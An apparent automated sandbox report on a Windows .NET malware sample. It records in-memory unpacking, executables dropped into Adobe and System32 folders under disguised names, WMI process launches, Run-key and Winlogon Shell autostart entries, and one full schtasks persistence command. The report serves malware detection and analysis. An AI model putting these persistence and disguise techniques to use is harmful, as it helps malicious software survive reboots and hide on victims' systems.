Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sfc_os.dll

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Directory created: C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Directory created: C:\Program Files\Microsoft\e589e10572e94b	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\e589e10572e94b	Jump to behavior

Source: k1iZHyRK6K.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: k1iZHyRK6K.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: 7C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.pdb source: k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000003042000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: k1iZHyRK6K.exe, sgG.cs	.Net Code: method_0 System.Reflection.Assembly.Load(byte[])
Source: k1iZHyRK6K.exe, Class4.cs	.Net Code: H86

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline"
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline"			Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B87FB02 pushad ; ret	0_2_00007FFD9B87FB03
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B878163 push ebx; ret	0_2_00007FFD9B87816A
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B9E6280 push esi; ret	0_2_00007FFD9B9E62C7
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA2400 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA2430 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA2428 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA2390 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA2360 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA23D3 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA23C0 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAAFB02 pushad ; ret	30_2_00007FFD9BAAFB03
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA2328 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA8163 push ebx; ret	30_2_00007FFD9BAA816A
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA2490 push ecx; retf	30_2_00007FFD9BAA24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB2400 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB2430 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB2428 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB2390 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB2360 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB23D3 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB23C0 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BABFB02 pushad ; ret	35_2_00007FFD9BABFB03
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB2328 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB8163 push ebx; ret	35_2_00007FFD9BAB816A
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB2490 push ecx; retf	35_2_00007FFD9BAB24F4
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BC35FC5 push eax; iretd	35_2_00007FFD9BC35FDD
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BC35F0A push E95F35E9h; ret	35_2_00007FFD9BC35F09
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BC26280 push esi; ret	35_2_00007FFD9BC262C7
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BC35E48 push E95F35E9h; ret	35_2_00007FFD9BC35F09
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 36_2_00007FFD9BAA2319 push ecx; retf	36_2_00007FFD9BAA24F4
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 36_2_00007FFD9BAA2400 push ecx; retf	36_2_00007FFD9BAA24F4

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

File written: C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe

Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\GZjfleQD.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\LcDwYjoO.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\IAvfBIwS.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\hKLkytLW.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\KGHfuADJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\xMRpRwBk.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\zIEPhtYo.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\YSUUeens.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\eUUurwLd.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\cbCbMxmL.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\CdzqKGoc.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\aMXlVeRh.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\EOeGRUzU.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\HeuFlNGE.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\fHYCcKHb.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\bnPvHrDf.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\iUeApcrA.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\WHyUeLIr.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\rpUzavtu.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\fzpjyagV.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\gvcKOXDZ.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\pZlzyQSG.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\XgAKFRwS.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\xqQPBCLW.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\QPVuBgDD.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\tzrAaNYu.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\YlLkFAlS.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\iLMKqBdM.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\cbCbMxmL.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\iUeApcrA.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\YlLkFAlS.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\XgAKFRwS.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\HeuFlNGE.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\GZjfleQD.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\xqQPBCLW.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\LcDwYjoO.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\QPVuBgDD.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\zIEPhtYo.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\pZlzyQSG.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\gvcKOXDZ.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\YSUUeens.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\WHyUeLIr.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\aMXlVeRh.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\IAvfBIwS.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\xMRpRwBk.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\hKLkytLW.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\fzpjyagV.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\eUUurwLd.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File created: C:\Users\user\Desktop\fHYCcKHb.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\EOeGRUzU.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\KGHfuADJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\CdzqKGoc.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\tzrAaNYu.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\rpUzavtu.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\iLMKqBdM.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File created: C:\Users\user\Desktop\bnPvHrDf.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb			Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run k1iZHyRK6K			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /f

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run k1iZHyRK6K	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run k1iZHyRK6K	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
